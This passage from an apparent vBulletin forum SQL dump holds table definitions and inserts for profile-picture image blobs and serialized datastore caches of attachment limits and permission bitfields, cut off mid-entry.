mæ\"~eÀþ•žt1Ÿº¿rš³q¦ëáv°Ú|Ä#åaŽþþ†»í(ý$üsò¸ìzt\'\nªòÜÇ’å,åšFdb}\0Ítÿ\0\r¼}©k\Z;6Ÿ§®Ð¼Éq/“vl\\7Š_ÎðÅÚ™¥Ø€RêQÓ<ê.Ÿu4ÑYé¶žtÁ21Àã\'#$óÉ\0U(ÆpÔÖ8ŽJ«µ¿~ºö>ŽøûGÚÁg£xž{8Dd”ÝóÅ*0ÚS)G\r‰ž+.ž´’Zítíò±Sö~ðvƒð×À\Zåï‹a·‡VÍóœab‡k\r§ý§î3¸(ÀõðŸ\\Áø®úâËþ=ç¤_—hÁ9È9 v±ñÆSxÃ^‘¤oôxܬj¿u±ÆïƲ㱡ݻo¯_FPœªÍë.óù¦2–&, B•ìþÔŸvÊrZ6>eÍ68¹Y¶÷榞ãÈC|µ\nMæž\0äWZEüñŽkÕtk†—አ&_2h˲“ÎsŸÃ•x6¯vnî¼ÆûÛB¯°+¤‡Ä×RéñªÌÁvŒûV5°ÊJ-nŽŒh¨Êi\Z²FåÆf‘öÿ\08ôç¥Ig¨,ˆÛ¾QL¸_&B½wà\nš;HÚ<†n¼â·—™æÑ»ÑîaûTy^gµQ¸×vÖlôæ®]\\‹wÂýÑÞ³înâFÁù³ZCcž¯æ^ðæ°Ö×õï]¢x°ì/jà4ò#˜{WF„”_”ô¥R)»›aêÊ1²gÿÙ', 1451334472, 'images(2).jpg', 1, 2623, 74, 80, 'ÿØÿà\0JFIF\0\0`\0`\0\0ÿá\0\"Exif\0\0MM\0*\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0ÿÛ\0C\0 \n\n\r\n\n \rÿÛ\0CÿÀ\0\0P\0J\"\0ÿÄ\0\0\0\0\0\0\0\0\0\0\0 \nÿÄ\0µ\0\0\0}\0!1AQa\"q2‘¡#B±ÁRÑð$3br‚ \n\Z%&\'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzƒ„…†‡ˆ‰Š’“”•–—˜™š¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖרÙÚáâãäåæçèéêñòóôõö÷øùúÿÄ\0\0\0\0\0\0\0\0 \nÿÄ\0µ\0\0w\0!1AQaq\"2B‘¡±Á #3RðbrÑ\n$4á%ñ\Z&\'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz‚ƒ„…†‡ˆ‰Š’“”•–—˜™š¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖרÙÚâãäåæçèéêòóôõö÷øùúÿÚ\0\0\0?\0ü1i˜{š±a>Æ9?xU]ŒÍÑ…X‚ªzôàמ–=®}nhÇs¼(ZÛÐ\'i_in[ÍsÖ6ï¼µªúì>f‘|É›ˆ¡\\ý{V×DvQgÍ\'dwV:+5¶æû¿Zž+(ÌyUÎÞ§Ò¼ƒYø‘¬kWVîEVZÛ±}ÎFHÏp{ÒØü?ñ7ˆl¼ë=#UxväJ‘¾Ü“×8Áô¬¾«mg$ŽèæÑ”¹hR”¿¯$Ïqðƃ\rÞ§•þR{šµâï ,R?Ùÿ\0y·†+ÊŸzùþëWñW&Û5æ©`ËÑ\'/ƒöd?†@¯^øyñ†òúm7ÄV‹g¨4^eÂE~„ž>]ãÃÇl0yëájÁûH;£ÓÁfØzÉЫ yÿ\0Z|Ê·vßgVVÜ¥kÙ÷·tÞ\'Õb¹vhÔ-És’ßpÖ”ïmHÈ®qS@¡Ò™ß+§n=ªy£¡_Æ¡ŠÉƒýìŠì>_ØÉ²ÍŒ«i!TdŸJåõ\rZMFîIOÌfQÙW=t~&µ}?ÃÑœö‰dúu?Λ xjÖÖæºˆÍ&3-÷Nz“ôâœg®f*ô¦Ú¢½YÂÝbßž/³¸Ô4Û}B)(ŽwÚ‰ÏßôÈ÷{WÐZÿ\0Ç]7\\Ô,´H!šúE‚]BFýÝ î\n[\0°Ïl\rx/ˆûJ1Ê!h[lcnÝßʽ[Á¿´µ§‡þÚh:o„t[yV0n¯.¢Ëu!ÎNàr02qŽ€ôó1Ô}¤•HÆï×O_øcè²Áa©Ë\r9¨§ùnß’µ~ïäu_¤ø‡ÌÓ„+>$`\"õÙ€ÊqÔzÿ\01œù|\Zc]ø:]&}«s¡Îmâ˜\r»YH1È=2\näúf¯Eñ‚ük‘ËAŽíî±!ÚõèOáŒzV…ìpê77—–ï‘]J¤´g*Ä\"‚AüGåJŒgM(Ë׿vâñ13s¥£Õ=:=WÝmeµi58ã—îùˆ©þz¡7²g«U¹Î×îõÈú“ý*±0gø«¶:Ÿ;+õ2màI$ÛïZ6:Î3ó+Œ”‰¥þû¯$ðq]Ï‚|)çù¹Îvç5jÊ\nìÖJVGâñolºjË·jïl°8RH\0œqÁÎ<~j±Il°É%™®•ˆÜvñŽƒ¨Á³Óú—ÆŸƒ×Çᦩ¥Ân-l\'ßq\Zw|¡úò œ÷‡\\W!ñ#༟\nþ ézæq$:·‰.›ìV¡vì·Ž<–\'ý¶•\0ûœô°ÅR©Ê”µm«yïùjnèÖ¥:’qÚ)ߢZ/ÇdyŽ¥|×÷·u8?ãEáÆìôÁöªr\Z‚Åﻨ늛el¶8è+Ôå²>mUn\\ì¿%ÏÚâÀþÖµ|!â9¼6ò#y“[È>dVÆ8#8Î;þ•ÎÚËäËÜV•ŒùF²}jeÕŽê2j\\éêz»Zx›Gó mæ\"~eÀþ•žt1Ÿº¿rš³q¦ëáv°Ú|Ä#åaŽþþ†»í(ý$üsò¸ìzt\'\nªòÜÇ’å,åšFdb}\0Ítÿ\0\r¼}©k\Z;6Ÿ§®Ð¼Éq/“vl\\7Š_ÎðÅÚ™¥Ø€RêQÓ<ê.Ÿu4ÑYé¶žtÁ21Àã\'#$óÉ\0U(ÆpÔÖ8ŽJ«µ¿~ºö>ŽøûGÚÁg£xž{8Dd”ÝóÅ*0ÚS)G\r‰ž+.ž´’Zítíò±Sö~ðvƒð×À\Zåï‹a·‡VÍóœab‡k\r§ý§î3¸(ÀõðŸ\\Áø®úâËþ=ç¤_—hÁ9È9 v±ñÆSxÃ^‘¤oôxܬj¿u±ÆïƲ㱡ݻo¯_FPœªÍë.óù¦2–&, B•ìþÔŸvÊrZ6>eÍ68¹Y¶÷榞ãÈC|µ\nMæž\0äWZEüñŽkÕtk†—አ&_2h˲“ÎsŸÃ•x6¯vnî¼ÆûÛB¯°+¤‡Ä×RéñªÌÁvŒûV5°ÊJ-nŽŒh¨Êi\Z²FåÆf‘öÿ\08ôç¥Ig¨,ˆÛ¾QL¸_&B½wà\nš;HÚ<†n¼â·—™æÑ»ÑîaûTy^gµQ¸×vÖlôæ®]\\‹wÂýÑÞ³înâFÁù³ZCcž¯æ^ðæ°Ö×õï]¢x°ì/jà4ò#˜{WF„”_”ô¥R)»›aêÊ1²gÿÙ', 74, 80);
DROP TABLE IF EXISTS `customprofilepic`;
CREATE TABLE `customprofilepic` (
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`filedata` mediumblob,
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`filename` varchar(100) NOT NULL DEFAULT '',
`visible` smallint(6) NOT NULL DEFAULT '1',
`filesize` int(10) unsigned NOT NULL DEFAULT '0',
`width` smallint(5) unsigned NOT NULL DEFAULT '0',
`height` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`userid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `customprofilepic` (`userid`, `filedata`, `dateline`, `filename`, `visible`, `filesize`, `width`, `height`) VALUES
(181, 'ÿØÿà\0JFIF\0\0–\0–\0\0ÿÛ\0C\0 \n \n\r\r\r\Z! #\'2*#%/%+;,/35888!*=A<6A2785ÿÛ\0C \n\n\r\r5$$55555555555555555555555555555555555555555555555555ÿÀ\0\0d\0d\0ÿÄ\0\0\0\0\0\0\0\0\0\0\0\0\0\0ÿÄ\0<\0\0\0\0\0\0\0!1AQaq\"2‘¡Á#$BRbr¢±Âðñ3‚’²ÑÿÄ\0\0\0\0\0\0\0\0\0\0\0\0\0\0ÿÄ\0\0\0\0\0\0\0\0\0\0\0!1AQÿÚ\0\0\0?\0¼h\nƒ(!$¨€2h1KÈRw’ SÐŽFƒá}#&ƒç¬ #Céï Í+J½Ò\rT@PUÒ÷Üëq€2&¼>æ+do¯¼þ”ö“ƒ°_}eë‚ž-´;\0<Ïí>¨©4°q4G JGA@1Œ\n\r9pJÐU^‰ÁËj_èƒjöÛåLÉÞiÄ’’AÁµùŸ-ê±dµòæc:ÖgþPO$¹Ø{ÈõÇ\\YŠiJ‚Ò’´‘,zÎz(`güÕëŸk¾ÃºÁfTgR¶Ÿ@Z1YRµsÔ5C…µa/!.Œ|ÌWN>#Æ<æ®¶÷ Í u§RR¤«¨z4ô®wKêÕé;´….Šüîž(Ϻœö^>5ÊÌUÃP©A *QÀ$öPQñõ+zËj&}ÁxµZ·™lò I$÷’AòÅjM:·kÝÁp±JôiÁö—“ŠuÓgõ\'ÿ\0*.o×!ªYbéfyÒÓ{Ž´“‡\0ÎAÝøÖ¥.%+JÅlCmaÅÀšŽÂ›$sáÄ}k<•rlŸZ+Wé}Ù$úô\rÖŸQ?ê{+óÁÏx5€ó@¥µÁ²èî¶w]}>®ƒÞ®øw¨9™7#Ã’ÓD§Ö0Aü£—¬¸¶Ghnï¯XT„o5\r\nF8owçÇʉ[:ÿ\0kW;ü·¡Zr¹\n(öBÞ²£ÐÊŠóÙûkP&é1€·¬½ÉÇ¿*GžÃ¶‰W&¼ÖQô52ÖÐ}÷VaíÝóÔç\0 ëU‹PÛõ®žá”©+N묯‰i]R¡ýäP½)}W ÛMåÖm¸‡$’}I〮ÂÚ¹zgœøS XèÍ%~büÓ…§¡¡£•¨ðÈìï§‹©mE5†µ\\”GP Q€1…uJD°’µGNx‡ \nrT¶ÃïjµëÖc©Xfàƒc¦÷¼Ÿ˜Ç`tµ]·™\Zj\0ð[ÊYÿ\0jqýT÷1A?³L4¶³%îžû§¿tõ«¬®É´¼Û³×3}Thoña¹âp{3ÝL4ߣ-–åGa»+JnÑoQ-s}îEG©Ç}Hì¢1Ö{7cZ_bJ¹\\D( TNJ·úgÙ᎔V:Sgvý6[öÙS™I SO-%)ÁÈ<\0ÉçD¬õV•‰©\"?–d7Å™(Ûg»»ºˆ@¿ßu‘‰êóƒKhÆä ƒ½åÌ\Z,WBèä‹¢ä8x¸¬š4Êó/ÖmgÜüÅ-:*O5Â2Áð_çIàêÊ‚©ÛÓjUªÚ¡ÈGÉ4<\rƒƒ4È´Ü-]vq›ÎJD…ˆhYO¦G_kžæhªŽ† ‹|FãDe0ÒwPÛiÂR;…A©µM«KC.²“*8By©g¸&¨N‰¶½16RY[’ckó œPÃyy4—X[kIRNA¨5QQí²ZB FÞVóœAÃëPе5\Zl2Êå>”¤)G\0PXp-É‹cf*\0.-öQ‘Õe`ý+yœO®Ž¬=±[Œ½Jrc¾•àAOó\"ƒš©AãA‚*\r‹5Þf¼±q·8Z²E©= ŽY§umK§âÜ¡¬)·Ð â…uIï\"ª9Ëk×wn›F¸!j%¨dGi\'ò„Ž?ÄME$Ð_{».~ˆK¬©PžS#?§CþÄyU‰U¾Ónâ漏Zˆtžñï|ÉøT!z$E¼°(¦kTâ,(¹ÕG¥n@馘ûCUØà$o Ipw dgçW—S/zæÍµ»½¢Tx&Ceì=‘Á åWivÛ=Ô8×\ZqHXì àÐC6¾ƒ×ÑŒ§áTX[\ZÕª°ê²%¯®*<w¡óåð …Û•Û^Ñg8¤á©»²[#¨#ø‚ª¯EAjlÊZì»9Ô$©•ûö÷>dUB6÷Qqåek;Ê\'‰$Ó/oˆ–ÔªÈ$ò†V®Bµâ,ØV§%ߤ ‚±èXÈéÍD|‡Æ±nªÔ¨\n\nÃk:N]à³÷‰ŠBG¼?_ˆëÝáAÏÒâ9ò…\'ÙÏAñ+ˆ5FÌw›* pz(sEÌ£^ìØHàréaX\nsó:ÂødöqŸú$Ù[‰5p<ÛÃvýŽÍe¾MÑ(P=_Ò( î ÃÖG ÓÁ;¤´ìÍ]{j3`¥”ç\\Ç\'©þúÔ´te¾ÈÊÆX@BÜ*\ršƒ$)%$\r;¯¶L´úi¶vËÑÎT¦ÅmþïhùÐS“lò!-[©*@ ÐÞ(WAúóêz„CyÍÈ×6—\rÜòöÆ|•ºj?µÒÓËfJn6¢•Â8\Zº\'¦Þc±¡í±Ã£ñ2ß’SÜ“ñ\n \\]ÕVëAK=¦†%£.ººzPË%\r7ÜPöP;ÏÒ è\r\'¤áé;_«Eî/׈ÁYéà ”ô@P\nšŸg–ÝFKÉ©(óu´‚ûï:\n¾ý±›³\nR˜ŽÜ´t[gþ\'ášé»<ºBs*‡)’\ræT1ò ô™¥$]ä‰f[r–¦c|8¾ªF æGnh$šÙmþò¸ènÝ%¶l6ߦO£á’I;ØæI4š_aÌB vðúN8ú:ø¨ý>4Œ‘S\r°Ê9!ƒf€ (\n€ (\n€ (\n€ (\nÿÙ', 1443048578, 'retina.jpeg', 1, 2637, 100, 100);
DROP TABLE IF EXISTS `datastore`;
CREATE TABLE `datastore` (
`title` char(50) NOT NULL DEFAULT '',
`data` mediumtext,
`unserialize` smallint(6) NOT NULL DEFAULT '0',
PRIMARY KEY (`title`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `datastore` (`title`, `data`, `unserialize`) VALUES
('attachmentcache', 'a:12:{s:3:\"bmp\";a:5:{s:4:\"size\";s:5:\"20000\";s:5:\"width\";s:3:\"620\";s:6:\"height\";s:3:\"280\";s:9:\"thumbnail\";s:1:\"0\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"doc\";a:5:{s:4:\"size\";s:5:\"20000\";s:5:\"width\";s:1:\"0\";s:6:\"height\";s:1:\"0\";s:9:\"thumbnail\";s:1:\"0\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"gif\";a:5:{s:4:\"size\";s:5:\"20000\";s:5:\"width\";s:3:\"620\";s:6:\"height\";s:3:\"280\";s:9:\"thumbnail\";s:1:\"1\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"jpe\";a:5:{s:4:\"size\";s:5:\"20000\";s:5:\"width\";s:3:\"620\";s:6:\"height\";s:3:\"280\";s:9:\"thumbnail\";s:1:\"1\";s:9:\"newwindow\";s:1:\"0\";}s:4:\"jpeg\";a:5:{s:4:\"size\";s:5:\"20000\";s:5:\"width\";s:3:\"620\";s:6:\"height\";s:3:\"280\";s:9:\"thumbnail\";s:1:\"1\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"jpg\";a:5:{s:4:\"size\";s:6:\"100000\";s:5:\"width\";s:1:\"0\";s:6:\"height\";s:1:\"0\";s:9:\"thumbnail\";s:1:\"1\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"pdf\";a:5:{s:4:\"size\";s:5:\"20000\";s:5:\"width\";s:1:\"0\";s:6:\"height\";s:1:\"0\";s:9:\"thumbnail\";s:1:\"1\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"png\";a:5:{s:4:\"size\";s:5:\"20000\";s:5:\"width\";s:3:\"620\";s:6:\"height\";s:3:\"280\";s:9:\"thumbnail\";s:1:\"1\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"psd\";a:5:{s:4:\"size\";s:5:\"20000\";s:5:\"width\";s:1:\"0\";s:6:\"height\";s:1:\"0\";s:9:\"thumbnail\";s:1:\"1\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"rar\";a:5:{s:4:\"size\";s:6:\"100000\";s:5:\"width\";s:1:\"0\";s:6:\"height\";s:1:\"0\";s:9:\"thumbnail\";s:1:\"0\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"txt\";a:5:{s:4:\"size\";s:5:\"20000\";s:5:\"width\";s:1:\"0\";s:6:\"height\";s:1:\"0\";s:9:\"thumbnail\";s:1:\"0\";s:9:\"newwindow\";s:1:\"0\";}s:3:\"zip\";a:5:{s:4:\"size\";s:6:\"100000\";s:5:\"width\";s:1:\"0\";s:6:\"height\";s:1:\"0\";s:9:\"thumbnail\";s:1:\"0\";s:9:\"newwindow\";s:1:\"0\";}}', 1),
('banemail', '', 0),
('bbcodecache', 'a:0:{}', 1),
('birthdaycache', 'a:4:{s:4:\"day1\";s:10:\"2016-08-12\";s:4:\"day2\";s:10:\"2016-08-13\";s:6:\"users1\";a:0:{}s:6:\"users2\";a:0:{}}', 1),
('bitfields', 'a:2:{s:3:\"ugp\";a:13:{s:16:\"forumpermissions\";a:24:{s:7:\"canview\";i:1;s:14:\"canviewthreads\";i:524288;s:13:\"canviewothers\";i:2;s:9:\"cansearch\";i:4;s:8:\"canemail\";i:8;s:10:\"canpostnew\";i:16;s:11:\"canreplyown\";i:32;s:14:\"canreplyothers\";i:64;s:11:\"caneditpost\";i:128;s:13:\"candeletepost\";i:256;s:15:\"candeletethread\";i:512;s:12:\"canopenclose\";i:1024;s:7:\"canmove\";i:2048;s:16:\"cangetattachment\";i:4096;s:17:\"canpostattachment\";i:8192;s:11:\"canpostpoll\";i:16384;s:7:\"canvote\";i:32768;s:13:\"canthreadrate\";i:65536;s:21:\"followforummoderation\";i:131072;s:15:\"canseedelnotice\";i:262144;s:9:\"cantagown\";i:1048576;s:12:\"cantagothers\";i:2097152;s:15:\"candeletetagown\";i:4194304;s:16:\"canseethumbnails\";i:8388608;}s:13:\"pmpermissions\";a:3:{s:10:\"cantrackpm\";i:1;s:17:\"candenypmreceipts\";i:2;s:14:\"canignorequota\";i:4;}s:19:\"calendarpermissions\";a:6:{s:15:\"canviewcalendar\";i:1;s:12:\"canpostevent\";i:2;s:12:\"caneditevent\";i:4;s:14:\"candeleteevent\";i:8;s:18:\"canviewothersevent\";i:16;s:14:\"isnotmoderated\";i:32;}s:14:\"wolpermissions\";a:5:{s:13:\"canwhosonline\";i:1;s:15:\"canwhosonlineip\";i:2;s:17:\"canwhosonlinefull\";i:4;s:16:\"canwhosonlinebad\";i:8;s:21:\"canwhosonlinelocation\";i:16;}s:16:\"adminpermissions\";a:18:{s:11:\"ismoderator\";i:1;s:15:\"cancontrolpanel\";i:2;s:16:\"canadminsettings\";i:4;s:14:\"canadminstyles\";i:8;s:17:\"canadminlanguages\";i:16;s:14:\"canadminforums\";i:32;s:15:\"canadminthreads\";i:64;s:17:\"canadmincalendars\";i:128;s:13:\"canadminusers\";i:256;s:19:\"canadminpermissions\";i:512;s:11:\"canadminfaq\";i:1024;s:14:\"canadminimages\";i:2048;s:15:\"canadminbbcodes\";i:4096;s:12:\"canadmincron\";i:8192;s:16:\"canadminmaintain\";i:16384;s:15:\"canadminplugins\";i:65536;s:15:\"canadminnotices\";i:131072;s:14:\"canadminmodlog\";i:262144;}s:18:\"genericpermissions\";a:31:{s:14:\"canviewmembers\";i:1;s:16:\"canmodifyprofile\";i:2;s:12:\"caninvisible\";i:4;s:22:\"canviewothersusernotes\";i:8;s:21:\"canmanageownusernotes\";i:16;s:12:\"canseehidden\";i:32;s:14:\"canbeusernoted\";i:64;s:13:\"canprofilepic\";i:128;s:20:\"cananimateprofilepic\";i:134217728;s:12:\"canuseavatar\";i:512;s:16:\"cananimateavatar\";i:67108864;s:15:\"canusesignature\";i:1024;s:17:\"canusecustomtitle\";i:2048;s:16:\"canseeprofilepic\";i:4096;s:19:\"canviewownusernotes\";i:8192;s:24:\"canmanageothersusernotes\";i:16384;s:19:\"canpostownusernotes\";i:32768;s:22:\"canpostothersusernotes\";i:65536;s:19:\"caneditownusernotes\";i:131072;s:24:\"canseehiddencustomfields\";i:262144;s:12:\"canseeownrep\";i:256;s:9:\"canuserep\";i:524288;s:10:\"canhiderep\";i:1048576;s:14:\"cannegativerep\";i:2097152;s:17:\"cangiveinfraction\";i:4194304;s:16:\"canseeinfraction\";i:8388608;s:20:\"cangivearbinfraction\";i:536870912;s:20:\"canreverseinfraction\";i:16777216;s:16:\"cansearchft_bool\";i:33554432;s:14:\"canemailmember\";i:268435456;s:12:\"cancreatetag\";i:1073741824;}s:19:\"genericpermissions2\";a:1:{s:13:\"canusefriends\";i:1;}s:16:\"albumpermissions\";a:8:{s:8:\"canalbum\";i:1;s:12:\"canviewalbum\";i:2;s:28:\"picturefollowforummoderation\";i:128;s:13:\"canpiccomment\";i:4;s:20:\"caneditownpiccomment\";i:8;s:22:\"candeleteownpiccomment\";i:16;s:19:\"canmanagepiccomment\";i:32;s:28:\"commentfollowforummoderation\";i:64;}s:18:\"usercsspermissions\";a:6:{s:17:\"caneditfontfamily\";i:1;s:15:\"caneditfontsize\";i:2;s:13:\"caneditcolors\";i:4;s:14:\"caneditbgimage\";i:8;s:14:\"caneditborders\";i:16;s:14:\"caneditprivacy\";i:32;}s:14:\"genericoptions\";a:7:{s:9:\"showgroup\";i:1;s:12:\"showbirthday\";i:2;s:14:\"showmemberlist\";i:4;s:12:\"showeditedby\";i:8;s:17:\"allowmembergroups\";i:16;s:16:\"isnotbannedgroup\";i:32;s:14:\"requirehvcheck\";i:64;}s:20:\"signaturepermissions\";a:17:{s:9:\"canbbcode\";i:131072;s:14:\"canbbcodebasic\";i:1;s:14:\"canbbcodecolor\";i:2;s:13:\"canbbcodesize\";i:4;s:13:\"canbbcodefont\";i:8;s:14:\"canbbcodealign\";i:16;s:13:\"canbbcodelist\";i:32;s:13:\"canbbcodelink\";i:64;s:13:\"canbbcodecode\";i:128;s:12:\"canbbcodephp\";i:256;s:13:\"canbbcodehtml\";i:512;s:14:\"canbbcodequote\";i:1024;s:8:\"allowimg\";i:2048;s:12:\"allowsmilies\";i:4096;s:9:\"allowhtml\";i:8192;s:9:\"cansigpic\";i:32768;s:16:\"cananimatesigpic\";i:65536;}s:25:\"visitormessagepermissions\";a:6:{s:20:\"canmessageownprofile\";i:1;s:23:\"canmessageothersprofile\";i:2;s:18:\"caneditownmessages\";i:4;s:20:\"candeleteownmessages\";i:8;s:19:\"canmanageownprofile\";i:32;s:21:\"followforummoderation\";i:16;}s:22:\"socialgrouppermissions\";a:16:{s:13:\"canjoingroups\";i:1;s:15:\"cancreategroups\";i:2;s:18:\"canmanageowngroups\";i:256;s:16:\"caneditowngroups\";i:4;s:18:\"candeleteowngroups\";i:8;s:13:\"canviewgroups\";i:16;s:14:\"canpostmessage\";i:512;s:20:\"canalwayspostmessage\";i:128;s:17:\"canmanagemessages\";i:32;s:19:\"cancreatediscussion\";i:1024;s:25:\"canalwayscreatediscussion\";i:2048;s:18:\"canlimitdiscussion\";i:4096;s:20:\"canmanagediscussions\";i:8192;s:21:\"followforummoderation\";i:64;s:18:\"canuploadgroupicon\";i:16384;s:19:\"cananimategroupicon\";i:32768;}}s:4:\"misc\";a:16:{s:8:\"intperms\";a:25:{s:11:\"attachlimit\";i:1;s:7:\"pmquota\";i:0;s:9:\"pmsendmax\";i:1;s:18:\"pmthrottlequantity\";i:1;s:18:\"profilepicmaxwidth\";i:1;s:19:\"profilepicmaxheight\";i:1;s:17:\"profilepicmaxsize\";i:1;s:14:\"avatarmaxwidth\";i:1;s:15:\"avatarmaxheight\";i:1;s:13:\"avatarmaxsize\";i:1;s:16:\"albumpicmaxwidth\";i:1;s:17:\"albumpicmaxheight\";i:1;s:15:\"albumpicmaxsize\";i:1;s:12:\"albummaxpics\";i:1;s:12:\"albummaxsize\";i:1;s:14:\"sigmaxrawchars\";i:1;s:11:\"sigmaxchars\";i:1;s:11:\"sigmaxlines\";i:1;s:16:\"sigmaxsizebbcode\";i:1;s:12:\"sigmaximages\";i:1;s:14:\"sigpicmaxwidth\";i:1;s:15:\"sigpicmaxheight\";i:1;s:13:\"sigpicmaxsize\";i:1;s:19:\"maximumsocialgroups\";i:1;s:16:\"groupiconmaxsize\";i:1;}s:13:\"bbcodeoptions\";a:5:{s:11:\"strip_empty\";i:1;s:10:\"stop_parse\";i:2;s:15:\"disable_smilies\";i:4;s:16:\"disable_wordwrap\";i:8;s:21:\"disable_urlconversion\";i:16;}s:23:\"calmoderatorpermissions\";a:5:{s:13:\"caneditevents\";i:1;s:15:\"candeleteevents\";i:2;s:17:\"canmoderateevents\";i:4;s:10:\"canviewips\";i:8;s:13:\"canmoveevents\";i:16;}s:20:\"moderatorpermissions\";a:23:{s:12:\"caneditposts\";i:1;s:14:\"candeleteposts\";i:2;s:12:\"canopenclose\";i:4;s:14:\"caneditthreads\";i:8;s:16:\"canmanagethreads\";i:16;s:11:\"canannounce\";i:32;s:16:\"canmoderateposts\";i:64;s:22:\"canmoderateattachments\";i:128;s:11:\"canmassmove\";i:256;s:12:\"canmassprune\";i:512;s:10:\"canviewips\";i:1024;s:14:\"canviewprofile\";i:2048;s:11:\"canbanusers\";i:4096;s:13:\"canunbanusers\";i:8192;s:14:\"newthreademail\";i:16384;s:12:\"newpostemail\";i:32768;s:14:\"cansetpassword\";i:65536;s:14:\"canremoveposts\";i:131072;s:11:\"caneditsigs\";i:262144;s:13:\"caneditavatar\";i:524288;s:11:\"caneditpoll\";i:1048576;s:17:\"caneditprofilepic\";i:2097152;s:17:\"caneditreputation\";i:4194304;}s:21:\"moderatorpermissions2\";a:22:{s:22:\"caneditvisitormessages\";i:1;s:24:\"candeletevisitormessages\";i:2;s:24:\"canremovevisitormessages\";i:4;s:26:\"canmoderatevisitormessages\";i:8;s:19:\"caneditalbumpicture\";i:16;s:21:\"candeletealbumpicture\";i:32;s:19:\"caneditsocialgroups\";i:64;s:21:\"candeletesocialgroups\";i:128;s:20:\"caneditgroupmessages\";i:256;s:22:\"candeletegroupmessages\";i:512;s:22:\"canremovegroupmessages\";i:1024;s:24:\"canmoderategroupmessages\";i:2048;s:26:\"canmoderatepicturecomments\";i:4096;s:24:\"candeletepicturecomments\";i:8192;s:24:\"canremovepicturecomments\";i:16384;s:22:\"caneditpicturecomments\";i:32768;s:19:\"canmoderatepictures\";i:65536;s:18:\"caneditdiscussions\";i:131072;s:20:\"candeletediscussions\";i:262144;s:20:\"canremovediscussions\";i:524288;s:22:\"canmoderatediscussions\";i:1048576;s:23:\"cantransfersocialgroups\";i:2097152;}s:15:\"languageoptions\";a:2:{s:9:\"direction\";i:1;s:7:\"dirmark\";i:2;}s:12:\"adminoptions\";a:2:{s:11:\"adminavatar\";i:1;s:15:\"adminprofilepic\";i:2;}s:11:\"useroptions\";a:23:{s:14:\"showsignatures\";i:1;s:11:\"showavatars\";i:2;s:10:\"showimages\";i:4;s:9:\"coppauser\";i:8;s:10:\"adminemail\";i:16;s:9:\"showvcard\";i:32;s:7:\"dstauto\";i:64;s:8:\"dstonoff\";i:128;s:9:\"showemail\";i:256;s:9:\"invisible\";i:512;s:14:\"showreputation\";i:1024;s:9:\"receivepm\";i:2048;s:9:\"emailonpm\";i:4096;s:13:\"hasaccessmask\";i:8192;s:9:\"postorder\";i:32768;s:16:\"receivepmbuddies\";i:131072;s:17:\"noactivationmails\";i:262144;s:12:\"pmboxwarning\";i:524288;s:11:\"showusercss\";i:1048576;s:25:\"receivefriendemailrequest\";i:2097152;s:9:\"vm_enable\";i:8388608;s:14:\"vm_contactonly\";i:16777216;s:17:\"pmdefaultsavecopy\";i:33554432;}s:12:\"forumoptions\";a:18:{s:6:\"active\";i:1;s:12:\"allowposting\";i:2;s:17:\"cancontainthreads\";i:4;s:15:\"moderatenewpost\";i:8;s:17:\"moderatenewthread\";i:16;s:14:\"moderateattach\";i:32;s:11:\"allowbbcode\";i:64;s:11:\"allowimages\";i:128;s:9:\"allowhtml\";i:256;s:12:\"allowsmilies\";i:512;s:10:\"allowicons\";i:1024;s:12:\"allowratings\";i:2048;s:10:\"countposts\";i:4096;s:15:\"canhavepassword\";i:8192;s:10:\"indexposts\";i:16384;s:13:\"styleoverride\";i:32768;s:15:\"showonforumjump\";i:65536;s:14:\"prefixrequired\";i:131072;}s:10:\"regoptions\";a:26:{s:10:\"adminemail\";i:1;s:13:\"invisiblemode\";i:2;s:12:\"receiveemail\";i:4;s:8:\"enablepm\";i:8;s:9:\"emailonpm\";i:16;s:7:\"pmpopup\";i:32;s:11:\"vbcode_none\";i:64;s:15:\"vbcode_standard\";i:128;s:15:\"vbcode_enhanced\";i:256;s:14:\"subscribe_none\";i:512;s:18:\"subscribe_nonotify\";i:1024;s:17:\"subscribe_instant\";i:2048;s:15:\"subscribe_daily\";i:4096;s:16:\"subscribe_weekly\";i:8192;s:5:\"vcard\";i:16384;s:9:\"signature\";i:32768;s:6:\"avatar\";i:65536;s:5:\"image\";i:131072;s:20:\"thread_linear_oldest\";i:262144;s:20:\"thread_linear_newest\";i:524288;s:15:\"thread_threaded\";i:1048576;s:13:\"thread_hybrid\";i:2097152;s:14:\"showreputation\";i:4194304;s:9:\"vm_enable\";i:8388608;s:14:\"vm_contactonly\";i:16777216;s:17:\"pmdefaultsavecopy\";i:33554432;}s:19:\"announcementoptions\";a:5:{s:11:\"allowbbcode\";i:1;s:9:\"allowhtml\";i:2;s:12:\"allowsmilies\";i:4;s:8:\"parseurl\";i:8;s:9:\"signature\";i:16;}s:11:\"feedoptions\";a:11:{s:7:\"enabled\";i:1;s:10:\"searchboth\";i:2;s:11:\"stickthread\";i:8;s:13:\"unstickthread\";i:16;s:11:\"closethread\";i:32;s:12:\"allowsmilies\";i:64;s:13:\"showsignature\";i:128;s:9:\"allowhtml\";i:256;s:14:\"moderatethread\";i:512;s:11:\"html2bbcode\";i:1024;s:8:\"matchall\";i:2048;}s:6:\"socnet\";a:6:{s:13:\"enable_groups\";i:1;s:13:\"enable_albums\";i:2;s:14:\"enable_friends\";i:4;s:23:\"enable_visitor_tracking\";i:8;s:24:\"enable_visitor_messaging\";i:16;s:22:\"enable_profile_styling\";i:32;}s:18:\"socialgroupoptions\";a:5:{s:15:\"owner_mod_queu